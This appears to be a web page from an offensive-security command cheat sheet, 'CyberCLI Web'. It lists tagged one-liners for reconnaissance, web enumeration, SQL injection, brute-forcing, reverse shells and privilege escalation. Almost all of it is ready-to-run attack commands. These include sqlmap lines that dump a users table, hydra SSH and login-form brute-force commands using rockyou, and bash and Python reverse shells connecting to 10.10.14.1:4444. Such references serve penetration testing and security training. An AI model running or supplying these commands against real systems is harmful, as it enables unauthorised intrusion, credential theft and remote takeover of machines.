Reconnaissance | CyberCLI Web

Offensive Beginner Free

Full port scan with service/version detection and default scripts on a subnet

nmap -sV -sC -p- --open -T4 192.168.1.0/24

nmap recon port-scan network enumeration

Nmap / Reconnaissance Open

Offensive Intermediate Free

Combined TCP SYN and UDP scan on common ports

nmap -sU -sS -p U:53,111,137,T:21-25,80,139,8080 192.168.1.1

nmap udp tcp stealth recon

Nmap / Reconnaissance Open

Offensive Intermediate Free

Run vulnerability detection NSE scripts against common service ports

nmap --script vuln -sV -p 80,443,22,21 <target>

nmap nse vulnerability cve web

Nmap / Reconnaissance Open

Offensive Beginner Free

Directory and file brute-force enumeration against a web server

gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt -t 50

gobuster web enumeration directory fuzzing

Gobuster / Enumeration Open

Offensive Intermediate Free

Virtual host (subdomain) enumeration via HTTP Host header fuzzing

gobuster vhost -u http://target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 30

gobuster vhost subdomain web enumeration

Gobuster / Enumeration Open

Offensive Intermediate Premium

Automated SQL injection discovery and database enumeration

sqlmap -u "http://target.com/page?id=1" --dbs --batch --level=3 --risk=2

sqlmap sql-injection web database exploitation

SQLMap / Web Hacking Open

Offensive Advanced Premium

POST-based SQL injection with credential dump from specific table

sqlmap -u "http://target.com/login" --data="user=admin&pass=test" --method POST -D webapp_db -T users --dump

sqlmap post credentials dump sqli

SQLMap / Web Hacking Open

Offensive Beginner Premium

SSH brute-force attack against a single username with rockyou wordlist

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 -t 4 -V

hydra brute-force ssh password credentials

Hydra / Password Attacks Open

Offensive Intermediate Premium

HTTP POST form brute-force with custom failure string detection

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt http-post-form "//login.php:username=^USER^&password=^PASS^:Invalid credentials" -t 30

hydra web post brute-force login

Hydra / Password Attacks Open

Offensive Beginner Premium

Start a Netcat listener to receive an incoming reverse shell connection

nc -lvnp 4444

netcat nc listener reverse-shell post-exploitation

Netcat / Reverse Shells Open

Offensive Beginner Premium

Bash TCP reverse shell one-liner — executes on the target to connect back

r'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'

bash reverse-shell rce tcp payload

Netcat / Reverse Shells Open

Offensive Intermediate Premium

Python3 reverse shell one-liner for targets with Python installed

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

python reverse-shell socket payload

Netcat / Reverse Shells Open

Offensive Intermediate Premium

Find all SUID binaries on the system for privilege escalation opportunities

find / -perm -4000 -type f 2>/dev/null

suid privesc gtfobins linux post-exploitation

Linux CLI / Privilege Escalation Open

Offensive Beginner Premium

List commands the current user can run with sudo — key privesc enumeration step

sudo -l

sudo privesc gtfobins linux enumeration

Linux CLI / Privilege Escalation Open

Offensive Beginner Free

OSINT email, subdomain, and employee enumeration from multiple sources

theHarvester -d target.com -b google,bing,linkedin,github -l 500

osint recon email subdomain passive

TheHarvester / OSINT Open